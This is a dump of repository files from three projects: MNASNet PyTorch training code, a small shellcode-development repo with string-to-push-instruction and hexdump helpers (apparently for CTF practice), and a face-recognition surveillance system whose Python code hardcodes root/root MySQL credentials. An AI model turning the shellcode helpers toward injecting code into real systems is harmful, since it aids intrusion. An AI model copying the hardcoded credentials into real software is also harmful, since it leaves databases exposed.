"avg_line_length": 34.482757568359375,
"blob_id": "405e0201199a312c1ceb2a61eea08a3f36c92460",
"content_id": "5af9387045babdf9965d0edeb59adb1940dca7fa",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1029,
"license_type": "permissive",
"max_line_length": 111,
"num_lines": 29,
"path": "/mixup.py",
"repo_name": "snakers4/MNASNet-pytorch-1",
"src_encoding": "UTF-8",
"text": "import torch\nfrom torch.distributions import Beta\n\nfrom utils.cross_entropy import onehot\n\n\ndef mixup(x, y, num_classes, gamma, smooth_eps):\n if gamma == 0 and smooth_eps == 0:\n return x, y\n m = Beta(torch.tensor([gamma]), torch.tensor([gamma]))\n lambdas = m.sample([x.size(0), 1, 1]).to(x)\n my = onehot(y, num_classes).to(x)\n true_class, false_class = 1. - smooth_eps * num_classes / (num_classes - 1), smooth_eps / (num_classes - 1)\n my = my * true_class + torch.ones_like(my) * false_class\n perm = torch.randperm(x.size(0))\n x2 = x[perm]\n y2 = my[perm]\n return x * (1 - lambdas) + x2 * lambdas, my * (1 - lambdas) + y2 * lambdas\n\n\nclass Mixup(torch.nn.Module):\n def __init__(self, num_classes=1000, gamma=0, smooth_eps=0):\n super(Mixup, self).__init__()\n self.num_classes = num_classes\n self.gamma = gamma\n self.smooth_eps = smooth_eps\n\n def forward(self, input, target):\n return mixup(input, target, self.num_classes, self.gamma, self.smooth_eps)\n"
},
{
"alpha_fraction": 0.6131446361541748,
"alphanum_fraction": 0.6297455430030823,
"avg_line_length": 50.21254348754883,
"blob_id": "1cb777cf6df4b5644d6e12fda075d37de0711bde",
"content_id": "4de672eff0a7ffc97a726cc88fd6bcaa42d81ad3",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 14698,
"license_type": "permissive",
"max_line_length": 128,
"num_lines": 287,
"path": "/imagenet.py",
"repo_name": "snakers4/MNASNet-pytorch-1",
"src_encoding": "UTF-8",
"text": "import argparse\nimport csv\nimport os\nimport random\nimport sys\nfrom datetime import datetime\n\nimport torch\nimport torch.backends.cudnn as cudnn\nimport torch.distributed as dist\nimport torch.nn.parallel\nimport torch.optim\nimport torch.utils.data\nfrom torch.optim.lr_scheduler import MultiStepLR, StepLR\nfrom tqdm import trange\n\nimport flops_benchmark\nfrom MnasNet import MnasNet\nfrom clr import CyclicLR\nfrom cosine_with_warmup import CosineLR\nfrom data import get_loaders\nfrom mixup import Mixup\nfrom utils.cross_entropy import CrossEntropyLoss\nfrom utils.logger import CsvLogger\nfrom utils.optimizer_wrapper import OptimizerWrapper\nfrom run import train, test, save_checkpoint, find_bounds_clr\n\n# https://arxiv.org/abs/1807.11626\n# input_size, scale\nclaimed_acc_top1 = {224: {0.35: 0.624, 0.5: 0.678, 0.75: 0.715, 1.: 0.74, 1.3: 0.755, 1.4: 0.759}, 192: {1: 0.724},\n 160: {1: 0.707}, 128: {1: 0.673}, 96: {1: 0.623}}\n\n\ndef get_args():\n parser = argparse.ArgumentParser(description='MNASNet training with PyTorch')\n parser.add_argument('--dataroot', required=True, metavar='PATH',\n help='Path to ImageNet train and val folders, preprocessed as described in '\n 'https://github.com/facebook/fb.resnet.torch/blob/master/INSTALL.md#download-the-imagenet-dataset')\n parser.add_argument('--device', default='cuda', help='device assignment (\"cpu\" or \"cuda\")')\n parser.add_argument('-j', '--workers', default=6, type=int, metavar='N',\n help='Number of data loading workers (default: 6)')\n parser.add_argument('--type', default='float32', help='Type of tensor: float32, float16, float64. Default: float32')\n\n # distributed\n parser.add_argument('--world-size', default=-1, type=int, help='number of distributed processes')\n parser.add_argument('--local_rank', default=-1, type=int, help='rank of distributed processes')\n parser.add_argument('--dist-init', default='env://', type=str, help='init used to set up distributed training')\n parser.add_argument('--dist-backend', default='nccl', type=str, help='distributed backend')\n\n # Optimization options\n parser.add_argument('--sched', dest='sched', type=str, default='multistep')\n parser.add_argument('--epochs', type=int, default=400, help='Number of epochs to train.')\n parser.add_argument('-b', '--batch-size', default=64, type=int, metavar='N', help='mini-batch size (default: 64)')\n parser.add_argument('--learning_rate', '-lr', type=float, default=0.1, help='The learning rate.')\n parser.add_argument('--momentum', '-m', type=float, default=0.9, help='Momentum.')\n parser.add_argument('--decay', '-d', type=float, default=1e-4, help='Weight decay (L2 penalty).')\n parser.add_argument('--gamma', type=float, default=0.1, help='LR is multiplied by gamma at scheduled epochs.')\n parser.add_argument('--schedule', type=int, nargs='+', default=[200, 300],\n help='Decrease learning rate at these epochs.')\n parser.add_argument('--step', type=int, default=40, help='Decrease learning rate each time.')\n parser.add_argument('--warmup', default=0, type=int, metavar='N', help='Warmup length')\n parser.add_argument('--mixup', type=float, default=0.2, help='Mixup gamma value.')\n parser.add_argument('--smooth-eps', type=float, default=0.1, help='Label smoothing epsilon value.')\n parser.add_argument('--num-classes', type=int, default=1000, help='Number of classes.')\n\n # CLR\n parser.add_argument('--min-lr', type=float, default=1e-5, help='Minimal LR for CLR.')\n parser.add_argument('--max-lr', type=float, default=1, help='Maximal LR for 
CLR.')\n parser.add_argument('--epochs-per-step', type=int, default=20,\n help='Number of epochs per step in CLR, recommended to be between 2 and 10.')\n parser.add_argument('--mode', default='triangular2', help='CLR mode. One of {triangular, triangular2, exp_range}')\n parser.add_argument('--find-clr', dest='find_clr', action='store_true',\n help='Run search for optimal LR in range (min_lr, max_lr)')\n\n # Checkpoints\n parser.add_argument('-e', '--evaluate', dest='evaluate', action='store_true', help='Just evaluate model')\n parser.add_argument('--save', '-s', type=str, default='', help='Folder to save checkpoints.')\n parser.add_argument('--results_dir', metavar='RESULTS_DIR', default='./results', help='Directory to store results')\n parser.add_argument('--resume', default='', type=str, metavar='PATH',\n help='path to latest checkpoint (default: none)')\n parser.add_argument('--start-epoch', default=0, type=int, metavar='N',\n help='manual epoch number (useful on restarts)')\n parser.add_argument('--log-interval', type=int, default=100, metavar='N',\n help='Number of batches between log messages')\n parser.add_argument('--seed', type=int, default=None, metavar='S', help='random seed (default: random)')\n\n # Architecture\n parser.add_argument('--scaling', type=float, default=1, metavar='SC', help='Scaling of MNASNet (default x1).')\n parser.add_argument('--dp', type=float, default=0.1, metavar='DP', help='Dropping probability of DropBlock')\n parser.add_argument('--input-size', type=int, default=224, metavar='I', help='Input size of MNASNet.')\n\n args = parser.parse_args()\n\n args.distributed = args.local_rank >= 0 or args.world_size > 1\n args.child = args.distributed and args.local_rank > 0\n if not args.distributed:\n args.local_rank = 0\n args.world_size = 1\n if args.seed is None:\n args.seed = random.randint(1, 10000)\n random.seed(args.seed)\n torch.manual_seed(args.seed)\n\n time_stamp = datetime.now().strftime('%Y-%m-%d_%H-%M-%S')\n if args.evaluate:\n args.results_dir = '/tmp'\n if args.save is '':\n args.save = time_stamp\n args.save_path = os.path.join(args.results_dir, args.save)\n if not os.path.exists(args.save_path) and not args.child:\n os.makedirs(args.save_path)\n\n if args.device == 'cuda' and torch.cuda.is_available():\n cudnn.enabled = True\n cudnn.benchmark = True\n args.gpus = [args.local_rank]\n args.device = 'cuda:' + str(args.gpus[0])\n torch.cuda.set_device(args.gpus[0])\n torch.cuda.manual_seed(args.seed)\n else:\n args.gpus = []\n args.device = 'cpu'\n\n if args.type == 'float64':\n args.dtype = torch.float64\n elif args.type == 'float32':\n args.dtype = torch.float32\n elif args.type == 'float16':\n args.dtype = torch.float16\n else:\n raise ValueError('Wrong type!') # TODO int8\n\n if not args.child:\n print(\"Random Seed: \", args.seed)\n print(args)\n return args\n\n\ndef is_bn(module):\n return isinstance(module, torch.nn.BatchNorm1d) or \\\n isinstance(module, torch.nn.BatchNorm2d) or \\\n isinstance(module, torch.nn.BatchNorm3d)\n\ndef main():\n args = get_args()\n device, dtype = args.device, args.dtype\n\n train_loader, val_loader = get_loaders(args.dataroot, args.batch_size, args.batch_size, args.input_size,\n args.workers, args.world_size, args.local_rank)\n\n model = MnasNet(n_class=args.num_classes, width_mult=args.scaling, drop_prob=0.0,\n num_steps=len(train_loader) * args.epochs)\n num_parameters = sum([l.nelement() for l in model.parameters()])\n flops = flops_benchmark.count_flops(MnasNet, 1, device,\n dtype, args.input_size, 3, 
width_mult=args.scaling)\n if not args.child:\n print(model)\n print('number of parameters: {}'.format(num_parameters))\n print('FLOPs: {}'.format(flops))\n\n # define loss function (criterion) and optimizer\n criterion = CrossEntropyLoss()\n mixup = Mixup(args.num_classes, args.mixup, args.smooth_eps)\n\n model, criterion = model.to(device=device, dtype=dtype), criterion.to(device=device, dtype=dtype)\n if args.dtype == torch.float16:\n for module in model.modules(): # FP batchnorm\n if is_bn(module):\n module.to(dtype=torch.float32)\n\n if args.distributed:\n args.device_ids = [args.local_rank]\n dist.init_process_group(backend=args.dist_backend, init_method=args.dist_init, world_size=args.world_size,\n rank=args.local_rank)\n model = torch.nn.parallel.DistributedDataParallel(model, device_ids=[args.local_rank],\n output_device=args.local_rank)\n print('Node #{}'.format(args.local_rank))\n else:\n model = torch.nn.parallel.DataParallel(model, device_ids=[args.local_rank], output_device=args.local_rank)\n\n optimizer_class = torch.optim.SGD\n optimizer_params = {\"lr\": args.learning_rate, \"momentum\": args.momentum, \"weight_decay\": args.decay,\n \"nesterov\": True}\n if args.find_clr:\n optimizer = torch.optim.SGD(model.parameters(), args.learning_rate, momentum=args.momentum,\n weight_decay=args.decay, nesterov=True)\n find_bounds_clr(model, train_loader, optimizer, criterion, device, dtype, min_lr=args.min_lr,\n max_lr=args.max_lr, step_size=args.epochs_per_step * len(train_loader), mode=args.mode,\n save_path=args.save_path)\n return\n\n if args.sched == 'clr':\n scheduler_class = CyclicLR\n scheduler_params = {\"base_lr\": args.min_lr, \"max_lr\": args.max_lr,\n \"step_size\": args.epochs_per_step * len(train_loader), \"mode\": args.mode}\n elif args.sched == 'multistep':\n scheduler_class = MultiStepLR\n scheduler_params = {\"milestones\": args.schedule, \"gamma\": args.gamma}\n elif args.sched == 'cosine':\n scheduler_class = CosineLR\n scheduler_params = {\"max_epochs\": args.epochs, \"warmup_epochs\": args.warmup, \"iter_in_epoch\": len(train_loader)}\n elif args.sched == 'gamma':\n scheduler_class = StepLR\n scheduler_params = {\"step_size\": 30, \"gamma\": args.gamma}\n else:\n raise ValueError('Wrong scheduler!')\n\n optim = OptimizerWrapper(model, optimizer_class=optimizer_class, optimizer_params=optimizer_params,\n scheduler_class=scheduler_class, scheduler_params=scheduler_params,\n use_shadow_weights=args.dtype == torch.float16)\n best_test = 0\n\n # optionally resume from a checkpoint\n data = None\n if args.resume:\n if os.path.isfile(args.resume):\n print(\"=> loading checkpoint '{}'\".format(args.resume))\n checkpoint = torch.load(args.resume, map_location=device)\n args.start_epoch = checkpoint['epoch'] - 1\n best_test = checkpoint['best_prec1']\n model.load_state_dict(checkpoint['state_dict'])\n optim.load_state_dict(checkpoint['optimizer'])\n print(\"=> loaded checkpoint '{}' (epoch {})\".format(args.resume, checkpoint['epoch']))\n elif os.path.isdir(args.resume):\n checkpoint_path = os.path.join(args.resume, 'checkpoint{}.pth.tar'.format(args.local_rank))\n csv_path = os.path.join(args.resume, 'results{}.csv'.format(args.local_rank))\n print(\"=> loading checkpoint '{}'\".format(checkpoint_path))\n checkpoint = torch.load(checkpoint_path, map_location=device)\n args.start_epoch = checkpoint['epoch'] - 1\n best_test = checkpoint['best_prec1']\n model.load_state_dict(checkpoint['state_dict'])\n optim.load_state_dict(checkpoint['optimizer'])\n print(\"=> loaded 
checkpoint '{}' (epoch {})\".format(checkpoint_path, checkpoint['epoch']))\n data = []\n with open(csv_path) as csvfile:\n reader = csv.DictReader(csvfile)\n for row in reader:\n data.append(row)\n else:\n print(\"=> no checkpoint found at '{}'\".format(args.resume))\n\n if args.evaluate:\n loss, top1, top5 = test(model, val_loader, criterion, device, dtype, args.child) # TODO\n return\n\n csv_logger = CsvLogger(filepath=args.save_path, data=data, local_rank=args.local_rank)\n csv_logger.save_params(sys.argv, args)\n\n claimed_acc1 = None\n claimed_acc5 = None\n if args.input_size in claimed_acc_top1:\n if args.scaling in claimed_acc_top1[args.input_size]:\n claimed_acc1 = claimed_acc_top1[args.input_size][args.scaling]\n if not args.child:\n csv_logger.write_text('Claimed accuracy is {:.2f}% top-1'.format(claimed_acc1 * 100.))\n train_network(args.start_epoch, args.epochs, optim, model, train_loader, val_loader, criterion, mixup,\n device, dtype, args.batch_size, args.log_interval, csv_logger, args.save_path, claimed_acc1,\n claimed_acc5, best_test, args.local_rank, args.child)\n\n\ndef train_network(start_epoch, epochs, optim, model, train_loader, val_loader, criterion, mixup, device, dtype,\n batch_size, log_interval, csv_logger, save_path, claimed_acc1, claimed_acc5, best_test, local_rank,\n child):\n my_range = range if child else trange\n for epoch in my_range(start_epoch, epochs + 1):\n if not isinstance(optim.scheduler, CyclicLR) and not isinstance(optim.scheduler, CosineLR):\n optim.scheduler_step()\n train_loss, train_accuracy1, train_accuracy5, = train(model, train_loader, mixup, epoch, optim, criterion,\n device, dtype, batch_size, log_interval, child)\n test_loss, test_accuracy1, test_accuracy5 = test(model, val_loader, criterion, device, dtype, child)\n csv_logger.write({'epoch': epoch + 1, 'val_error1': 1 - test_accuracy1, 'val_error5': 1 - test_accuracy5,\n 'val_loss': test_loss, 'train_error1': 1 - train_accuracy1,\n 'train_error5': 1 - train_accuracy5, 'train_loss': train_loss})\n save_checkpoint({'epoch': epoch + 1, 'state_dict': model.state_dict(), 'best_prec1': best_test,\n 'optimizer': optim.state_dict()}, test_accuracy1 > best_test, filepath=save_path,\n local_rank=local_rank)\n\n csv_logger.plot_progress(claimed_acc1=claimed_acc1, claimed_acc5=claimed_acc5)\n\n if test_accuracy1 > best_test:\n best_test = test_accuracy1\n\n csv_logger.write_text('Best accuracy is {:.2f}% top-1'.format(best_test * 100.))\n\n\nif __name__ == '__main__':\n main()\n"
},
{
"alpha_fraction": 0.5737704634666443,
"alphanum_fraction": 0.7377049326896667,
"avg_line_length": 11.399999618530273,
"blob_id": "e8726c7854716613ceff8b56614530754fd96f3c",
"content_id": "a6ab9f55a0471b66add9e134eb8b59ff69c83f10",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 61,
"license_type": "permissive",
"max_line_length": 18,
"num_lines": 5,
"path": "/requirements.txt",
"repo_name": "snakers4/MNASNet-pytorch-1",
"src_encoding": "UTF-8",
"text": "torch>=1.0.0\ntorchvision>=0.2.0\ntqdm>=4.19.4\nmatplotlib\nnumpy"
},
{
"alpha_fraction": 0.5790055394172668,
"alphanum_fraction": 0.5834254026412964,
"avg_line_length": 35.20000076293945,
"blob_id": "56baf0ac9ef994aaade09e9bcd5e8c46a38d68c9",
"content_id": "1af2e954fe9853750578982bf32a52b049f81839",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 905,
"license_type": "permissive",
"max_line_length": 108,
"num_lines": 25,
"path": "/cosine_with_warmup.py",
"repo_name": "snakers4/MNASNet-pytorch-1",
"src_encoding": "UTF-8",
"text": "# temporary file\nimport math\n\nfrom torch.optim.lr_scheduler import _LRScheduler\n\n\nclass CosineLR(_LRScheduler):\n \"\"\"\n \"\"\"\n\n def __init__(self, optimizer, max_epochs, warmup_epochs, iter_in_epoch, eta_min=0, last_epoch=-1):\n self.T_max = (max_epochs - warmup_epochs) * iter_in_epoch\n self.T_warmup = warmup_epochs * iter_in_epoch\n self.eta_min = eta_min\n self.warmup_step = eta_min\n super(CosineLR, self).__init__(optimizer, last_epoch)\n\n def get_lr(self):\n if self.last_epoch > self.T_warmup:\n curr_T = self.last_epoch - self.T_warmup\n return [self.eta_min + (base_lr - self.eta_min) *\n (1 + math.cos(math.pi * curr_T / self.T_max)) / 2\n for base_lr in self.base_lrs]\n else:\n return [(base_lr - self.eta_min) * self.last_epoch / self.T_warmup for base_lr in self.base_lrs]\n"
}
] | 5 |
jaiverma/shellcode
|
https://github.com/jaiverma/shellcode
|
621057c0073a0310f6c16e901b3a5c84ab5f8836
|
884cdd91468e91f7891356e247f4a92714fe2af8
|
57b0565b71e497583ea85030cbb4b2cc2aa03f15
|
refs/heads/master
| 2020-08-27T23:40:02.436345 | 2020-02-29T18:25:05 | 2020-02-29T18:27:41 | 217,522,688 | 2 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.652996838092804,
"alphanum_fraction": 0.6656151413917542,
"avg_line_length": 16.61111068725586,
"blob_id": "4db78e5a145ee751298a0c1cb6d1671ce8d80824",
"content_id": "3883f22133297b1bf12bdbbfc4e30315a2edd9e1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 317,
"license_type": "no_license",
"max_line_length": 124,
"num_lines": 18,
"path": "/README.md",
"repo_name": "jaiverma/shellcode",
"src_encoding": "UTF-8",
"text": "# Shellcode\n\nThis is junk.\n\n## Misc\n\nDump `.text` section of binary to a file with `objcopy`. This is good for extracting shellcode out of a `.o` or `.out` file.\n\n```sh\n$ objcopy main.o --dump-section .text=main.text.bin\n```\n\n\nRun binary with `socat`.\n\n```sh\n$ socat TCP-LISTEN:1234,reuseaddr,fork EXEC:\"./a.out\"\n```\n"
},
{
"alpha_fraction": 0.5079365372657776,
"alphanum_fraction": 0.5590828657150269,
"avg_line_length": 18.55172348022461,
"blob_id": "618f02c099cd6571db5aa8dc9dc5da3ba1899e54",
"content_id": "bcebc6a17f6f4b330e511ee4c2a136bbf5dcfacb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 567,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 29,
"path": "/utils/str_to_stack.py",
"repo_name": "jaiverma/shellcode",
"src_encoding": "UTF-8",
"text": "'''\nScript to convert a string to opcodes to push it\nonto the stack.\nE.g. 'Hello world\\n' ->\n push 0x0a646c72\n push 0x6f77206f\n push 0x6c6c6548\n'''\n\nimport sys\nimport codecs\n\ndef f(s):\n cmds = []\n # pad string to be a multiple of 4\n pad_n = len(s) % 4\n l_s = s[::-1]\n for i in range(0, len(l_s), 4):\n cmd = 'push 0x{}'.format(codecs.encode(l_s[i:i+4], 'hex').decode('utf-8'))\n cmds.append(cmd)\n return cmds\n\ndef main():\n s = b'hello world\\n'\n # s = b'//home//orw/flag'\n cmds = f(s)\n print('\\n'.join(cmds))\n\nmain()\n"
},
{
"alpha_fraction": 0.6355140209197998,
"alphanum_fraction": 0.672897219657898,
"avg_line_length": 14.285714149475098,
"blob_id": "67811a0ce757ba192cfb413c64703df6ffba22a7",
"content_id": "09fceaa2d79408001cb6b5d0990504f1ebd5b10a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Makefile",
"length_bytes": 107,
"license_type": "no_license",
"max_line_length": 36,
"num_lines": 7,
"path": "/ll/Makefile",
"repo_name": "jaiverma/shellcode",
"src_encoding": "UTF-8",
"text": "all: main.out\n\nmain.o: main.S\n\tnasm -f elf32 main.S\n\nmain.out: main.o\n\tgcc -m32 -static -o main.out main.o\n"
},
{
"alpha_fraction": 0.7121211886405945,
"alphanum_fraction": 0.7121211886405945,
"avg_line_length": 17.85714340209961,
"blob_id": "b417f6b599f7d5b7e914fa43606f417ed1692c51",
"content_id": "2973f9d05aa237622df4c065b8336fdd1e76cb05",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Makefile",
"length_bytes": 132,
"license_type": "no_license",
"max_line_length": 42,
"num_lines": 7,
"path": "/hello/arm/data/Makefile",
"repo_name": "jaiverma/shellcode",
"src_encoding": "UTF-8",
"text": "all: main.out\n\nmain.o: main.S\n\tarm-linux-gnueabihf-as main.S -o main.o\n\nmain.out: main.o\n\tarm-linux-gnueabihf-ld main.o -o main.out\n"
},
{
"alpha_fraction": 0.5927419066429138,
"alphanum_fraction": 0.5967742204666138,
"avg_line_length": 15.533333778381348,
"blob_id": "fc35a3d7f6fb1904f66705a1bb50862cd90dc194",
"content_id": "3e703618cbc00bd2e54f5546393b0f9d3a27b4f2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 248,
"license_type": "no_license",
"max_line_length": 42,
"num_lines": 15,
"path": "/utils/hexdump.py",
"repo_name": "jaiverma/shellcode",
"src_encoding": "UTF-8",
"text": "import sys\nimport codecs\n\ndef f(fname):\n data = bytes()\n with open(fname, 'rb') as f:\n data = f.read()\n return data\n\ndef main():\n shellcode = f(sys.argv[1])\n print(shellcode)\n print(codecs.encode(shellcode, 'hex'))\n\nmain()\n"
},
{
"alpha_fraction": 0.6190476417541504,
"alphanum_fraction": 0.6666666865348816,
"avg_line_length": 14,
"blob_id": "7f690f22a2a69a5e4b28cbef40dfaab6b436b2ea",
"content_id": "8291a50d2eec75cde49f8146629aec2b2a2e0776",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Makefile",
"length_bytes": 105,
"license_type": "no_license",
"max_line_length": 34,
"num_lines": 7,
"path": "/hello/x86/data/Makefile",
"repo_name": "jaiverma/shellcode",
"src_encoding": "UTF-8",
"text": "all: main.out\n\nmain.o: main.S\n\tnasm -f elf32 main.S\n\nmain.out: main.o\n\tld -m elf_i386 main.o -o main.out\n"
}
] | 6 |
Reznov9185/Ensuring-Security-Using-Computer-Vision
|
https://github.com/Reznov9185/Ensuring-Security-Using-Computer-Vision
|
d7c8f94e0b33ff4b144f62dd359632b0582b6a42
|
17a93d0d6d20c1cbf569e6c68e48151d0f0e44b5
|
c61f56ae4941da7be614756f1757e430e2b79eb8
|
refs/heads/master
| 2021-03-27T12:30:14.774103 | 2018-10-13T17:40:26 | 2018-10-13T17:40:26 | 47,739,646 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5694581270217896,
"alphanum_fraction": 0.6098521947860718,
"avg_line_length": 24.58823585510254,
"blob_id": "035e625065cf86d07ba84caac361fc4cbc4337fe",
"content_id": "a5d28f99973c007126cba43722b75868f193b45c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "SQL",
"length_bytes": 3045,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 119,
"path": "/surveillance_db.sql",
"repo_name": "Reznov9185/Ensuring-Security-Using-Computer-Vision",
"src_encoding": "UTF-8",
"text": "-- phpMyAdmin SQL Dump\n-- version 4.0.10deb1\n-- http://www.phpmyadmin.net\n--\n-- Host: localhost\n-- Generation Time: Dec 01, 2015 at 01:31 PM\n-- Server version: 5.5.46-0ubuntu0.14.04.2\n-- PHP Version: 5.5.30-1+deb.sury.org~trusty+1\n\nSET SQL_MODE = \"NO_AUTO_VALUE_ON_ZERO\";\nSET time_zone = \"+00:00\";\n\n\n/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;\n/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;\n/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;\n/*!40101 SET NAMES utf8 */;\n\n--\n-- Database: `surveillance_db`\n--\n\n-- --------------------------------------------------------\n\n--\n-- Table structure for table `access_entries`\n--\n\nCREATE TABLE IF NOT EXISTS `access_entries` (\n `access_id` int(11) NOT NULL AUTO_INCREMENT,\n `subject_id` int(11) NOT NULL,\n `access_time` text NOT NULL,\n `confidence` double NOT NULL,\n `origin_x` int(11) NOT NULL,\n `origin_y` int(11) NOT NULL,\n `height` int(11) NOT NULL,\n `width` int(11) NOT NULL,\n PRIMARY KEY (`access_id`)\n) ENGINE=MyISAM DEFAULT CHARSET=latin1 AUTO_INCREMENT=1 ;\n\n-- --------------------------------------------------------\n\n--\n-- Table structure for table `authentication_table`\n--\n\nCREATE TABLE IF NOT EXISTS `authentication_table` (\n `room_id` int(11) NOT NULL,\n `subject_id` int(11) NOT NULL,\n PRIMARY KEY (`room_id`,`subject_id`)\n) ENGINE=InnoDB DEFAULT CHARSET=latin1;\n\n--\n-- Dumping data for table `authentication_table`\n--\n\nINSERT INTO `authentication_table` (`room_id`, `subject_id`) VALUES\n(1, 1),\n(1, 3);\n\n-- --------------------------------------------------------\n\n--\n-- Table structure for table `motion_entries`\n--\n\nCREATE TABLE IF NOT EXISTS `motion_entries` (\n `event_id` int(11) NOT NULL AUTO_INCREMENT,\n `room_id` int(11) NOT NULL,\n `occupied_time` text NOT NULL,\n PRIMARY KEY (`event_id`)\n) ENGINE=MyISAM DEFAULT CHARSET=latin1 AUTO_INCREMENT=1 ;\n\n-- --------------------------------------------------------\n\n--\n-- Table structure for table `rooms`\n--\n\nCREATE TABLE IF NOT EXISTS `rooms` (\n `id` int(11) NOT NULL AUTO_INCREMENT,\n `room_id` int(11) NOT NULL,\n `floor_number` int(11) NOT NULL,\n `building_no` int(11) NOT NULL,\n PRIMARY KEY (`id`),\n UNIQUE KEY `room_id` (`room_id`)\n) ENGINE=InnoDB DEFAULT CHARSET=latin1 AUTO_INCREMENT=2 ;\n\n--\n-- Dumping data for table `rooms`\n--\n\nINSERT INTO `rooms` (`id`, `room_id`, `floor_number`, `building_no`) VALUES\n(1, 100, 5, 2);\n\n-- --------------------------------------------------------\n\n--\n-- Table structure for table `subjects`\n--\n\nCREATE TABLE IF NOT EXISTS `subjects` (\n `subject_id` int(11) NOT NULL,\n `subject_name` text NOT NULL,\n PRIMARY KEY (`subject_id`)\n) ENGINE=MyISAM DEFAULT CHARSET=latin1;\n\n--\n-- Dumping data for table `subjects`\n--\n\nINSERT INTO `subjects` (`subject_id`, `subject_name`) VALUES\n(1, 'Saleh'),\n(2, 'Tawhid'),\n(3, 'Sajid');\n\n/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;\n/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;\n/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;\n"
},
{
"alpha_fraction": 0.7995750904083252,
"alphanum_fraction": 0.8094900846481323,
"avg_line_length": 31.837209701538086,
"blob_id": "7a026aa6c5a91a38a89e29363551e28ce6b99410",
"content_id": "d10cf79aa1b17450266ef38e7795477e4329ecf7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1412,
"license_type": "no_license",
"max_line_length": 101,
"num_lines": 43,
"path": "/README.md",
"repo_name": "Reznov9185/Ensuring-Security-Using-Computer-Vision",
"src_encoding": "UTF-8",
"text": "# Ensuring Security with Computer Vision\n\nArchitecture\n\n\nIn our implementation, we have used devices and computers which are general in terms\nof computation, performance and efficiency. The results would be more satisfactory if\ndevices and computers with higher computational ability could be used. In the next\niteration, such devices can be used. Considering computation for better computational\ntime and efficiency, we could reduce the number of recognition performed on the same\nperson while they are in our observation window. We can achieve this by tracking a\nrecognized person while they are in our observation window.\nWe have proposed and implemented a security system considering the scenario of an\norganizational security. Our aim was to derive data in real time so that extracted data\ncan be helpful as a tool to ensure and enhance security.\n\nProgramming Language and modules:\n\nLanguage: Python .\n\nModules: OpenCV, imutils, datetime, MySQLdb, Image from PIL, OS, numpy.\n\nDatabase:\n\nDatabase: mysql server version- 5.5.46.\n\nAlgorithms\n\nTraining:\n\n1. Haar Cascade frontal face classifier\n2. Local Binary Pattern Histogram.\n\nMotion detecting:\n\n1. Background subtraction\n2. Dilate\n3. Find Contour\n\nFace recognition:\n\n1. Haar Cascade frontal face classifier\n2. Predict with Local Binary Pattern Histogram.\n"
},
{
"alpha_fraction": 0.5273643136024475,
"alphanum_fraction": 0.546141505241394,
"avg_line_length": 40.0093879699707,
"blob_id": "09ee1ac7bc9f33dc9fb77b222d09970a01dc3498",
"content_id": "909e59b0a9c75157ced4d5754c26fa1954a3f3e6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8734,
"license_type": "no_license",
"max_line_length": 316,
"num_lines": 213,
"path": "/surveillance.py",
"repo_name": "Reznov9185/Ensuring-Security-Using-Computer-Vision",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport cv2, os, imutils, datetime, MySQLdb\nfrom PIL import Image\n\n#mysql connection\n\n\ndb = MySQLdb.connect(host=\"localhost\",\n user=\"root\",\n passwd=\"root\",\n db=\"surveillance_db\")\ncur = db.cursor()\n\nroom_id = 1\nglobal alarm\nalarm = 0\n\n# Haar cascade classifier for classifying frontal face\nface_cascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')\nif face_cascade.empty():\n raise Exception(\"Can not find your cascade classifier file . Are you sure, the path is correct ?\")\n\n# Start train for recognition\n# For face recognition we will use the LBPH Face Recognizer\nrecognizer = cv2.createLBPHFaceRecognizer()\n\n\ndef training():\n def get_images_labels(path):\n image_paths = [os.path.join(path, f) for f in os.listdir(path)]\n images = []\n labels = []\n for image_path in image_paths:\n # Read the image and convert to grayscale\n image_pil = Image.open(image_path).convert('L')\n # Convert the image format into numpy array\n image = np.array(image_pil, 'uint8')\n # Get the label of the image\n nbr = int(os.path.split(image_path)[1].split(\".\")[0].replace(\"subject\", \"\"))\n # Detect the face in the image\n faces = face_cascade.detectMultiScale(image)\n # If face is detected, append the face to images and the label to labels\n for (x, y, w, h) in faces:\n images.append(image[y: y + h, x: x + w])\n labels.append(nbr)\n cv2.imshow(\"Adding faces to traning set...\", image[y: y + h, x: x + w])\n cv2.waitKey(5)\n # return the images list and labels list\n return images, labels\n\n # Path to the Yale Dataset\n path = './training_faces'\n # Call the get_images_and_labels function and get the face images and the\n # corresponding labels\n images, labels = get_images_labels(path)\n cv2.destroyAllWindows()\n\n # Perform the training\n recognizer.train(images, np.array(labels))\n\n\ndef recognize(filename):\n predict_image_pil = Image.open(filename)\n predict_image = np.array(predict_image_pil, 'uint8')\n faces = face_cascade.detectMultiScale(predict_image)\n for (x, y, w, 